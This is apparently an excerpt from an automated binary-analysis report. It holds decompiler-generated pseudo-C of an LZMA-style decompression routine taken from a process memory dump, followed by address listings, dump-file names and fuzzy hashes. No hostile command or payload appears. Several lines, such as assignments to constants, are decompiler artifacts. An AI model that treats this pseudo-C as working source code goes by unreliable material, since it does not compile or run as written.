                                                                                                                        								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                        								__eflags =  *_t400;
                                                                                                                        								goto L123;
                                                                                                                        							}
                                                                                                                        							__ecx = __ebx;
                                                                                                                        							__eax = __ebx;
                                                                                                                        							__ecx = __ebx >> 1;
                                                                                                                        							__eax = __ebx & 0x00000001;
                                                                                                                        							__ecx = (__ebx >> 1) - 1;
                                                                                                                        							__al = __al | 0x00000002;
                                                                                                                        							__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                        							__eflags = __ebx - 0xe;
                                                                                                                        							 *(__ebp - 0x2c) = __eax;
                                                                                                                        							if(__ebx >= 0xe) {
                                                                                                                        								__ebx = 0;
                                                                                                                        								 *(__ebp - 0x48) = __ecx;
                                                                                                                        								L102:
                                                                                                                        								__eflags =  *(__ebp - 0x48);
                                                                                                                        								if( *(__ebp - 0x48) <= 0) {
                                                                                                                        									__eax = __eax + __ebx;
                                                                                                                        									 *(__ebp - 0x40) = 4;
                                                                                                                        									 *(__ebp - 0x2c) = __eax;
                                                                                                                        									__eax =  *(__ebp - 4);
                                                                                                                        									__eax =  *(__ebp - 4) + 0x644;
                                                                                                                        									__eflags = __eax;
                                                                                                                        									L108:
                                                                                                                        									__ebx = 0;
                                                                                                                        									 *(__ebp - 0x58) = __eax;
                                                                                                                        									 *(__ebp - 0x50) = 1;
                                                                                                                        									 *(__ebp - 0x44) = 0;
                                                                                                                        									 *(__ebp - 0x48) = 0;
                                                                                                                        									L112:
                                                                                                                        									__eax =  *(__ebp - 0x40);
                                                                                                                        									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                        									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                        										_t391 = __ebp - 0x2c;
                                                                                                                        										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                        										__eflags =  *_t391;
                                                                                                                        										goto L119;
                                                                                                                        									}
                                                                                                                        									__eax =  *(__ebp - 0x50);
                                                                                                                        									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                        									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                        									__eax =  *(__ebp - 0x58);
                                                                                                                        									__esi = __edi + __eax;
                                                                                                                        									 *(__ebp - 0x54) = __esi;
                                                                                                                        									__ax =  *__esi;
                                                                                                                        									__ecx = __ax & 0x0000ffff;
                                                                                                                        									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                        									__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                        									if( *(__ebp - 0xc) >= __edx) {
                                                                                                                        										__ecx = 0;
                                                                                                                        										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                        										__ecx = 1;
                                                                                                                        										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                        										__ebx = 1;
                                                                                                                        										__ecx =  *(__ebp - 0x48);
                                                                                                                        										__ebx = 1 << __cl;
                                                                                                                        										__ecx = 1 << __cl;
                                                                                                                        										__ebx =  *(__ebp - 0x44);
                                                                                                                        										__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                        										__cx = __ax;
                                                                                                                        										__cx = __ax >> 5;
                                                                                                                        										__eax = __eax - __ecx;
                                                                                                                        										__edi = __edi + 1;
                                                                                                                        										__eflags = __edi;
                                                                                                                        										 *(__ebp - 0x44) = __ebx;
                                                                                                                        										 *__esi = __ax;
                                                                                                                        										 *(__ebp - 0x50) = __edi;
                                                                                                                        									} else {
                                                                                                                        										 *(__ebp - 0x10) = __edx;
                                                                                                                        										0x800 = 0x800 - __ecx;
                                                                                                                        										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                        										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                        										 *__esi = __dx;
                                                                                                                        									}
                                                                                                                        									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        									if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        										L111:
                                                                                                                        										_t368 = __ebp - 0x48;
                                                                                                                        										 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                        										__eflags =  *_t368;
                                                                                                                        										goto L112;
                                                                                                                        									} else {
                                                                                                                        										goto L109;
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								__ecx =  *(__ebp - 0xc);
                                                                                                                        								__ebx = __ebx + __ebx;
                                                                                                                        								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                        								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                        								 *(__ebp - 0x44) = __ebx;
                                                                                                                        								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                        									__ecx =  *(__ebp - 0x10);
                                                                                                                        									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                        									__ebx = __ebx | 0x00000001;
                                                                                                                        									__eflags = __ebx;
                                                                                                                        									 *(__ebp - 0x44) = __ebx;
                                                                                                                        								}
                                                                                                                        								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                        								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                        									L101:
                                                                                                                        									_t338 = __ebp - 0x48;
                                                                                                                        									 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                                                        									__eflags =  *_t338;
                                                                                                                        									goto L102;
                                                                                                                        								} else {
                                                                                                                        									goto L99;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							__edx =  *(__ebp - 4);
                                                                                                                        							__eax = __eax - __ebx;
                                                                                                                        							 *(__ebp - 0x40) = __ecx;
                                                                                                                        							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                        							goto L108;
                                                                                                                        						case 0x1a:
                                                                                                                        							L56:
                                                                                                                        							__eflags =  *(__ebp - 0x64);
                                                                                                                        							if( *(__ebp - 0x64) == 0) {
                                                                                                                        								 *(__ebp - 0x88) = 0x1a;
                                                                                                                        								goto L170;
                                                                                                                        							}
                                                                                                                        							__ecx =  *(__ebp - 0x68);
                                                                                                                        							__al =  *(__ebp - 0x5c);
                                                                                                                        							__edx =  *(__ebp - 8);
                                                                                                                        							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                        							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                        							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                        							 *( *(__ebp - 0x68)) = __al;
                                                                                                                        							__ecx =  *(__ebp - 0x14);
                                                                                                                        							 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                                                        							__eax = __ecx + 1;
                                                                                                                        							__edx = 0;
                                                                                                                        							_t192 = __eax %  *(__ebp - 0x74);
                                                                                                                        							__eax = __eax /  *(__ebp - 0x74);
                                                                                                                        							__edx = _t192;
                                                                                                                        							goto L79;
                                                                                                                        						case 0x1b:
                                                                                                                        							goto L75;
                                                                                                                        						case 0x1c:
                                                                                                                        							while(1) {
                                                                                                                        								L123:
                                                                                                                        								__eflags =  *(__ebp - 0x64);
                                                                                                                        								if( *(__ebp - 0x64) == 0) {
                                                                                                                        									break;
                                                                                                                        								}
                                                                                                                        								__eax =  *(__ebp - 0x14);
                                                                                                                        								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                        								__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                        								if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                        									__eax = __eax +  *(__ebp - 0x74);
                                                                                                                        									__eflags = __eax;
                                                                                                                        								}
                                                                                                                        								__edx =  *(__ebp - 8);
                                                                                                                        								__cl =  *(__eax + __edx);
                                                                                                                        								__eax =  *(__ebp - 0x14);
                                                                                                                        								 *(__ebp - 0x5c) = __cl;
                                                                                                                        								 *(__eax + __edx) = __cl;
                                                                                                                        								__eax = __eax + 1;
                                                                                                                        								__edx = 0;
                                                                                                                        								_t414 = __eax %  *(__ebp - 0x74);
                                                                                                                        								__eax = __eax /  *(__ebp - 0x74);
                                                                                                                        								__edx = _t414;
                                                                                                                        								__eax =  *(__ebp - 0x68);
                                                                                                                        								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                        								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                        								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                        								__eflags =  *(__ebp - 0x30);
                                                                                                                        								 *( *(__ebp - 0x68)) = __cl;
                                                                                                                        								 *(__ebp - 0x14) = _t414;
                                                                                                                        								if( *(__ebp - 0x30) > 0) {
                                                                                                                        									continue;
                                                                                                                        								} else {
                                                                                                                        									goto L80;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							 *(__ebp - 0x88) = 0x1c;
                                                                                                                        							goto L170;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}













                                                                                                                        0x00406133
                                                                                                                        0x00406136
                                                                                                                        0x004061a7
                                                                                                                        0x004061aa
                                                                                                                        0x004061ad
                                                                                                                        0x004061b4
                                                                                                                        0x004061be
                                                                                                                        0x00000000
                                                                                                                        0x004061be
                                                                                                                        0x00406138
                                                                                                                        0x0040613c
                                                                                                                        0x0040613f
                                                                                                                        0x00406141
                                                                                                                        0x00406144
                                                                                                                        0x00406147
                                                                                                                        0x00406149
                                                                                                                        0x0040614c
                                                                                                                        0x0040614e
                                                                                                                        0x00406153
                                                                                                                        0x00406156
                                                                                                                        0x00406159
                                                                                                                        0x0040615d
                                                                                                                        0x00406164
                                                                                                                        0x00406167
                                                                                                                        0x0040616e
                                                                                                                        0x00406172
                                                                                                                        0x0040617a
                                                                                                                        0x0040617a
                                                                                                                        0x0040617a
                                                                                                                        0x00406174
                                                                                                                        0x00406174
                                                                                                                        0x00406174
                                                                                                                        0x00406169
                                                                                                                        0x00406169
                                                                                                                        0x00406169
                                                                                                                        0x0040617e
                                                                                                                        0x00406181
                                                                                                                        0x0040619f
                                                                                                                        0x004061a1
                                                                                                                        0x00000000
                                                                                                                        0x00406183
                                                                                                                        0x00406183
                                                                                                                        0x00406186
                                                                                                                        0x00406189
                                                                                                                        0x0040618c
                                                                                                                        0x0040618e
                                                                                                                        0x0040618e
                                                                                                                        0x0040618e
                                                                                                                        0x00406191
                                                                                                                        0x00406194
                                                                                                                        0x00406196
                                                                                                                        0x00406197
                                                                                                                        0x0040619a
                                                                                                                        0x00000000
                                                                                                                        0x0040619a
                                                                                                                        0x00000000
                                                                                                                        0x004063d0
                                                                                                                        0x004063d4
                                                                                                                        0x004063f2
                                                                                                                        0x004063f5
                                                                                                                        0x004063fc
                                                                                                                        0x004063ff
                                                                                                                        0x00406402
                                                                                                                        0x00406405
                                                                                                                        0x00406408
                                                                                                                        0x0040640b
                                                                                                                        0x0040640d
                                                                                                                        0x00406414
                                                                                                                        0x00406415
                                                                                                                        0x00406417
                                                                                                                        0x0040641a
                                                                                                                        0x0040641d
                                                                                                                        0x00406420
                                                                                                                        0x00406420
                                                                                                                        0x00406425
                                                                                                                        0x00000000
                                                                                                                        0x00406425
                                                                                                                        0x004063d6
                                                                                                                        0x004063d9
                                                                                                                        0x004063dc
                                                                                                                        0x004063e6
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040643a
                                                                                                                        0x0040643e
                                                                                                                        0x00406461
                                                                                                                        0x00406464
                                                                                                                        0x00406467
                                                                                                                        0x00406471
                                                                                                                        0x00406440
                                                                                                                        0x00406440
                                                                                                                        0x00406443
                                                                                                                        0x00406446
                                                                                                                        0x00406449
                                                                                                                        0x00406456
                                                                                                                        0x00406459
                                                                                                                        0x00406459
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004064ee
                                                                                                                        0x004064f2
                                                                                                                        0x004064f9
                                                                                                                        0x004064fc
                                                                                                                        0x004064ff
                                                                                                                        0x00406509
                                                                                                                        0x00000000
                                                                                                                        0x00406509
                                                                                                                        0x004064f4
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406515
                                                                                                                        0x00406519
                                                                                                                        0x00406520
                                                                                                                        0x00406523
                                                                                                                        0x00406526
                                                                                                                        0x0040651b
                                                                                                                        0x0040651b
                                                                                                                        0x0040651b
                                                                                                                        0x00406529
                                                                                                                        0x0040652c
                                                                                                                        0x0040652f
                                                                                                                        0x0040652f
                                                                                                                        0x00406532
                                                                                                                        0x00406535
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004065d5
                                                                                                                        0x004065d5
                                                                                                                        0x004065d9
                                                                                                                        0x00406977
                                                                                                                        0x00000000
                                                                                                                        0x00406977
                                                                                                                        0x004065df
                                                                                                                        0x004065e2
                                                                                                                        0x004065e5
                                                                                                                        0x004065e9
                                                                                                                        0x004065ec
                                                                                                                        0x004065f2
                                                                                                                        0x004065f4
                                                                                                                        0x004065f4
                                                                                                                        0x004065f4
                                                                                                                        0x004065f7
                                                                                                                        0x004065fa
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004061ca
                                                                                                                        0x004061ca
                                                                                                                        0x004061ce
                                                                                                                        0x0040693b
                                                                                                                        0x00000000
                                                                                                                        0x0040693b
                                                                                                                        0x004061d4
                                                                                                                        0x004061d7
                                                                                                                        0x004061da
                                                                                                                        0x004061de
                                                                                                                        0x004061e1
                                                                                                                        0x004061e7
                                                                                                                        0x004061e9
                                                                                                                        0x004061e9
                                                                                                                        0x004061e9
                                                                                                                        0x004061ec
                                                                                                                        0x004061ef
                                                                                                                        0x004061ef
                                                                                                                        0x004061f2
                                                                                                                        0x004061f5
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004061fb
                                                                                                                        0x00406201
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406207
                                                                                                                        0x00406207
                                                                                                                        0x0040620b
                                                                                                                        0x0040620e
                                                                                                                        0x00406211
                                                                                                                        0x00406214
                                                                                                                        0x00406217
                                                                                                                        0x00406218
                                                                                                                        0x0040621b
                                                                                                                        0x0040621d
                                                                                                                        0x00406223
                                                                                                                        0x00406226
                                                                                                                        0x00406229
                                                                                                                        0x0040622c
                                                                                                                        0x0040622f
                                                                                                                        0x00406232
                                                                                                                        0x00406235
                                                                                                                        0x00406251
                                                                                                                        0x00406254
                                                                                                                        0x00406257
                                                                                                                        0x0040625a
                                                                                                                        0x00406261
                                                                                                                        0x00406265
                                                                                                                        0x00406267
                                                                                                                        0x0040626b
                                                                                                                        0x00406237
                                                                                                                        0x00406237
                                                                                                                        0x0040623b
                                                                                                                        0x00406243
                                                                                                                        0x00406248
                                                                                                                        0x0040624a
                                                                                                                        0x0040624c
                                                                                                                        0x0040624c
                                                                                                                        0x0040626e
                                                                                                                        0x00406275
                                                                                                                        0x00406278
                                                                                                                        0x00000000
                                                                                                                        0x0040627e
                                                                                                                        0x00000000
                                                                                                                        0x0040627e
                                                                                                                        0x004065cd
                                                                                                                        0x004066fd
                                                                                                                        0x004066fd
                                                                                                                        0x004066fd
                                                                                                                        0x004066fd
                                                                                                                        0x00406700
                                                                                                                        0x00406700
                                                                                                                        0x00406703
                                                                                                                        0x00406705
                                                                                                                        0x0040698f
                                                                                                                        0x00000000
                                                                                                                        0x0040698f
                                                                                                                        0x0040670b
                                                                                                                        0x0040670e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406714
                                                                                                                        0x00406718
                                                                                                                        0x0040671b
                                                                                                                        0x0040671b
                                                                                                                        0x0040671b
                                                                                                                        0x00000000
                                                                                                                        0x0040671b
                                                                                                                        0x00406599
                                                                                                                        0x0040659b
                                                                                                                        0x0040659d
                                                                                                                        0x0040659f
                                                                                                                        0x004065a2
                                                                                                                        0x004065a3
                                                                                                                        0x004065a5
                                                                                                                        0x004065a7
                                                                                                                        0x004065aa
                                                                                                                        0x004065ad
                                                                                                                        0x004065c3
                                                                                                                        0x004065c8
                                                                                                                        0x00406600
                                                                                                                        0x00406600
                                                                                                                        0x00406604
                                                                                                                        0x00406630
                                                                                                                        0x00406632
                                                                                                                        0x00406639
                                                                                                                        0x0040663c
                                                                                                                        0x0040663f
                                                                                                                        0x0040663f
                                                                                                                        0x00406644
                                                                                                                        0x00406644
                                                                                                                        0x00406646
                                                                                                                        0x00406649
                                                                                                                        0x00406650
                                                                                                                        0x00406653
                                                                                                                        0x00406680
                                                                                                                        0x00406680
                                                                                                                        0x00406683
                                                                                                                        0x00406686
                                                                                                                        0x004066fa
                                                                                                                        0x004066fa
                                                                                                                        0x004066fa
                                                                                                                        0x00000000
                                                                                                                        0x004066fa
                                                                                                                        0x00406688
                                                                                                                        0x0040668e
                                                                                                                        0x00406691
                                                                                                                        0x00406694
                                                                                                                        0x00406697
                                                                                                                        0x0040669a
                                                                                                                        0x0040669d
                                                                                                                        0x004066a0
                                                                                                                        0x004066a3
                                                                                                                        0x004066a6
                                                                                                                        0x004066a9
                                                                                                                        0x004066c2
                                                                                                                        0x004066c4
                                                                                                                        0x004066c7
                                                                                                                        0x004066c8
                                                                                                                        0x004066cb
                                                                                                                        0x004066cd
                                                                                                                        0x004066d0
                                                                                                                        0x004066d2
                                                                                                                        0x004066d4
                                                                                                                        0x004066d7
                                                                                                                        0x004066d9
                                                                                                                        0x004066dc
                                                                                                                        0x004066e0
                                                                                                                        0x004066e2
                                                                                                                        0x004066e2
                                                                                                                        0x004066e3
                                                                                                                        0x004066e6
                                                                                                                        0x004066e9
                                                                                                                        0x004066ab
                                                                                                                        0x004066ab
                                                                                                                        0x004066b3
                                                                                                                        0x004066b8
                                                                                                                        0x004066ba
                                                                                                                        0x004066bd
                                                                                                                        0x004066bd
                                                                                                                        0x004066ec
                                                                                                                        0x004066f3
                                                                                                                        0x0040667d
                                                                                                                        0x0040667d
                                                                                                                        0x0040667d
                                                                                                                        0x0040667d
                                                                                                                        0x00000000
                                                                                                                        0x004066f5
                                                                                                                        0x00000000
                                                                                                                        0x004066f5
                                                                                                                        0x004066f3
                                                                                                                        0x00406606
                                                                                                                        0x00406609
                                                                                                                        0x0040660b
                                                                                                                        0x0040660e
                                                                                                                        0x00406611
                                                                                                                        0x00406614
                                                                                                                        0x00406616
                                                                                                                        0x00406619
                                                                                                                        0x0040661c
                                                                                                                        0x0040661c
                                                                                                                        0x0040661f
                                                                                                                        0x0040661f
                                                                                                                        0x00406622
                                                                                                                        0x00406629
                                                                                                                        0x004065fd
                                                                                                                        0x004065fd
                                                                                                                        0x004065fd
                                                                                                                        0x004065fd
                                                                                                                        0x00000000
                                                                                                                        0x0040662b
                                                                                                                        0x00000000
                                                                                                                        0x0040662b
                                                                                                                        0x00406629
                                                                                                                        0x004065af
                                                                                                                        0x004065b2
                                                                                                                        0x004065b4
                                                                                                                        0x004065b7
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406316
                                                                                                                        0x00406316
                                                                                                                        0x0040631a
                                                                                                                        0x0040695f
                                                                                                                        0x00000000
                                                                                                                        0x0040695f
                                                                                                                        0x00406320
                                                                                                                        0x00406323
                                                                                                                        0x00406326
                                                                                                                        0x00406329
                                                                                                                        0x0040632c
                                                                                                                        0x0040632f
                                                                                                                        0x00406332
                                                                                                                        0x00406334
                                                                                                                        0x00406337
                                                                                                                        0x0040633a
                                                                                                                        0x0040633d
                                                                                                                        0x0040633f
                                                                                                                        0x0040633f
                                                                                                                        0x0040633f
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040671e
                                                                                                                        0x0040671e
                                                                                                                        0x0040671e
                                                                                                                        0x00406722
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00406728
                                                                                                                        0x0040672b
                                                                                                                        0x0040672e
                                                                                                                        0x00406731
                                                                                                                        0x00406733
                                                                                                                        0x00406733
                                                                                                                        0x00406733
                                                                                                                        0x00406736
                                                                                                                        0x00406739
                                                                                                                        0x0040673c
                                                                                                                        0x0040673f
                                                                                                                        0x00406742
                                                                                                                        0x00406745
                                                                                                                        0x00406746
                                                                                                                        0x00406748
                                                                                                                        0x00406748
                                                                                                                        0x00406748
                                                                                                                        0x0040674b
                                                                                                                        0x0040674e
                                                                                                                        0x00406751
                                                                                                                        0x00406754
                                                                                                                        0x00406757
                                                                                                                        0x0040675b
                                                                                                                        0x0040675d
                                                                                                                        0x00406760
                                                                                                                        0x00000000
                                                                                                                        0x00406762
                                                                                                                        0x00000000
                                                                                                                        0x00406762
                                                                                                                        0x00406760
                                                                                                                        0x00406995
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00405fc4

Memory Dump Source
• Source File: 00000001.00000002.365911946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.365886810.0000000000400000.00000002.00020000.sdmp
• Associated: 00000001.00000002.365927406.0000000000407000.00000002.00020000.sdmp
• Associated: 00000001.00000002.365944229.0000000000409000.00000004.00020000.sdmp
• Associated: 00000001.00000002.366054796.0000000000422000.00000004.00020000.sdmp
• Associated: 00000001.00000002.366079180.0000000000429000.00000004.00020000.sdmp
• Associated: 00000001.00000002.366135002.0000000000444000.00000002.00020000.sdmp
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3ca4e82cbd918d9bc6f131d9bc7fd5d61b9600368ad5a57dd77e762cc9babb20
• Instruction ID: e06b97397237a54a8f7c6fae7a0c48c933f493286525731b7b3672fa0d973436
• Opcode Fuzzy Hash: 3ca4e82cbd918d9bc6f131d9bc7fd5d61b9600368ad5a57dd77e762cc9babb20
• Instruction Fuzzy Hash: 678155B1D00229CFDF24CFA8C8447ADBBB1FB44305F25816AD456BB281D7789A96CF54
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 98%
                                                                                                                        			E00405F82(void* __ecx) {
                                                                                                                        				void* _v8;
                                                                                                                        				void* _v12;
                                                                                                                        				signed int _v16;
                                                                                                                        				unsigned int _v20;
                                                                                                                        				signed int _v24;
                                                                                                                        				signed int _v28;
                                                                                                                        				signed int _v32;
                                                                                                                        				signed int _v36;
                                                                                                                        				signed int _v40;
                                                                                                                        				signed int _v44;
                                                                                                                        				signed int _v48;
                                                                                                                        				signed int _v52;
                                                                                                                        				signed int _v56;
                                                                                                                        				signed int _v60;
                                                                                                                        				signed int _v64;
                                                                                                                        				signed int _v68;
                                                                                                                        				signed int _v72;
                                                                                                                        				signed int _v76;
                                                                                                                        				signed int _v80;
                                                                                                                        				signed int _v84;
                                                                                                                        				signed int _v88;
                                                                                                                        				signed int _v92;
                                                                                                                        				signed int _v95;
                                                                                                                        				signed int _v96;
                                                                                                                        				signed int _v100;
                                                                                                                        				signed int _v104;
                                                                                                                        				signed int _v108;
                                                                                                                        				signed int _v112;
                                                                                                                        				signed int _v116;
                                                                                                                        				signed int _v120;
                                                                                                                        				intOrPtr _v124;
                                                                                                                        				signed int _v128;
                                                                                                                        				signed int _v132;
                                                                                                                        				signed int _v136;
                                                                                                                        				void _v140;
                                                                                                                        				void* _v148;
                                                                                                                        				signed int _t537;
                                                                                                                        				signed int _t538;
                                                                                                                        				signed int _t572;
                                                                                                                        
                                                                                                                        				_t572 = 0x22;
                                                                                                                        				_v148 = __ecx;
                                                                                                                        				memcpy( &_v140, __ecx, _t572 << 2);
                                                                                                                        				if(_v52 == 0xffffffff) {
                                                                                                                        					return 1;
                                                                                                                        				}
                                                                                                                        				while(1) {
                                                                                                                        					L3:
                                                                                                                        					_t537 = _v140;
                                                                                                                        					if(_t537 > 0x1c) {
                                                                                                                        						break;
                                                                                                                        					}
                                                                                                                        					switch( *((intOrPtr*)(_t537 * 4 +  &M004069D4))) {
                                                                                                                        						case 0:
                                                                                                                        							__eflags = _v112;
                                                                                                                        							if(_v112 == 0) {
                                                                                                                        								goto L173;
                                                                                                                        							}
                                                                                                                        							_v112 = _v112 - 1;
                                                                                                                        							_v116 = _v116 + 1;
                                                                                                                        							_t537 =  *_v116;
                                                                                                                        							__eflags = _t537 - 0xe1;
                                                                                                                        							if(_t537 > 0xe1) {
                                                                                                                        								goto L174;
                                                                                                                        							}
                                                                                                                        							_t542 = _t537 & 0x000000ff;
                                                                                                                        							_push(0x2d);
                                                                                                                        							asm("cdq");
                                                                                                                        							_pop(_t576);
                                                                                                                        							_push(9);
                                                                                                                        							_pop(_t577);
                                                                                                                        							_t622 = _t542 / _t576;
                                                                                                                        							_t544 = _t542 % _t576 & 0x000000ff;
                                                                                                                        							asm("cdq");
                                                                                                                        							_t617 = _t544 % _t577 & 0x000000ff;
                                                                                                                        							_v64 = _t617;
                                                                                                                        							_v32 = (1 << _t622) - 1;
                                                                                                                        							_v28 = (1 << _t544 / _t577) - 1;
                                                                                                                        							_t625 = (0x300 << _t617 + _t622) + 0x736;
                                                                                                                        							__eflags = 0x600 - _v124;
                                                                                                                        							if(0x600 == _v124) {
                                                                                                                        								L12:
                                                                                                                        								__eflags = _t625;
                                                                                                                        								if(_t625 == 0) {
                                                                                                                        									L14:
                                                                                                                        									_v76 = _v76 & 0x00000000;
                                                                                                                        									_v68 = _v68 & 0x00000000;
                                                                                                                        									goto L17;
                                                                                                                        								} else {
                                                                                                                        									goto L13;
                                                                                                                        								}
                                                                                                                        								do {
                                                                                                                        									L13:
                                                                                                                        									_t625 = _t625 - 1;
                                                                                                                        									__eflags = _t625;
                                                                                                                        									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                                                                                                                        								} while (_t625 != 0);
                                                                                                                        								goto L14;
                                                                                                                        							}
                                                                                                                        							__eflags = _v8;
                                                                                                                        							if(_v8 != 0) {
                                                                                                                        								GlobalFree(_v8);
                                                                                                                        							}
                                                                                                                        							_t537 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                        							__eflags = _t537;
                                                                                                                        							_v8 = _t537;
                                                                                                                        							if(_t537 == 0) {
                                                                                                                        								goto L174;
                                                                                                                        							} else {
                                                                                                                        								_v124 = 0x600;
                                                                                                                        								goto L12;
                                                                                                                        							}
                                                                                                                        						case 1:
                                                                                                                        							L15:
                                                                                                                        							__eflags = _v112;
                                                                                                                        							if(_v112 == 0) {
                                                                                                                        								_v140 = 1;
                                                                                                                        								goto L173;
                                                                                                                        							}
                                                                                                                        							_v112 = _v112 - 1;
                                                                                                                        							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                                                                                                                        							_v116 = _v116 + 1;
                                                                                                                        							_t50 =  &_v76;
                                                                                                                        							 *_t50 = _v76 + 1;
                                                                                                                        							__eflags =  *_t50;
                                                                                                                        							L17:
                                                                                                                        							__eflags = _v76 - 4;
                                                                                                                        							if(_v76 < 4) {
                                                                                                                        								goto L15;
                                                                                                                        							}
                                                                                                                        							_t550 = _v68;
                                                                                                                        							__eflags = _t550 - _v120;
                                                                                                                        							if(_t550 == _v120) {
                                                                                                                        								L22:
                                                                                                                        								_v76 = 5;
                                                                                                                        								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                                                                                                                        								goto L25;
                                                                                                                        							}
                                                                                                                        							__eflags = _v12;
                                                                                                                        							_v120 = _t550;
                                                                                                                        							if(_v12 != 0) {
                                                                                                                        								GlobalFree(_v12);
                                                                                                                        							}
                                                                                                                        							_t537 = GlobalAlloc(0x40, _v68); // executed
                                                                                                                        							__eflags = _t537;
                                                                                                                        							_v12 = _t537;
                                                                                                                        							if(_t537 == 0) {
                                                                                                                        								goto L174;
                                                                                                                        							} else {
                                                                                                                        								goto L22;
                                                                                                                        							}
                                                                                                                        						case 2:
                                                                                                                        							L26:
                                                                                                                        							_t557 = _v100 & _v32;
                                                                                                                        							_v136 = 6;
                                                                                                                        							_v80 = _t557;
                                                                                                                        							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                                                                                                                        							goto L135;
                                                                                                                        						case 3:
                                                                                                                        							L23:
                                                                                                                        							__eflags = _v112;
                                                                                                                        							if(_v112 == 0) {
                                                                                                                        								_v140 = 3;
                                                                                                                        								goto L173;
                                                                                                                        							}
                                                                                                                        							_v112 = _v112 - 1;
                                                                                                                        							_t72 =  &_v116;
                                                                                                                        							 *_t72 = _v116 + 1;
                                                                                                                        							__eflags =  *_t72;
                                                                                                                        							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                        							L25:
                                                                                                                        							_v76 = _v76 - 1;
                                                                                                                        							__eflags = _v76;
                                                                                                                        							if(_v76 != 0) {
                                                                                                                        								goto L23;
                                                                                                                        							}
                                                                                                                        							goto L26;
                                                                                                                        						case 4:
                                                                                                                        							L136:
                                                                                                                        							_t559 =  *_t626;
                                                                                                                        							_t610 = _t559 & 0x0000ffff;
                                                                                                                        							_t591 = (_v20 >> 0xb) * _t610;
                                                                                                                        							__eflags = _v16 - _t591;
                                                                                                                        							if(_v16 >= _t591) {
                                                                                                                        								_v20 = _v20 - _t591;
                                                                                                                        								_v16 = _v16 - _t591;
                                                                                                                        								_v68 = 1;
                                                                                                                        								_t560 = _t559 - (_t559 >> 5);
                                                                                                                        								__eflags = _t560;
                                                                                                                        								 *_t626 = _t560;
                                                                                                                        							} else {
                                                                                                                        								_v20 = _t591;
                                                                                                                        								_v68 = _v68 & 0x00000000;
                                                                                                                        								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                                                                                                                        							}
                                                                                                                        							__eflags = _v20 - 0x1000000;
                                                                                                                        							if(_v20 >= 0x1000000) {
                                                                                                                        								goto L142;
                                                                                                                        							} else {
                                                                                                                        								goto L140;
                                                                                                                        							}
                                                                                                                        						case 5:
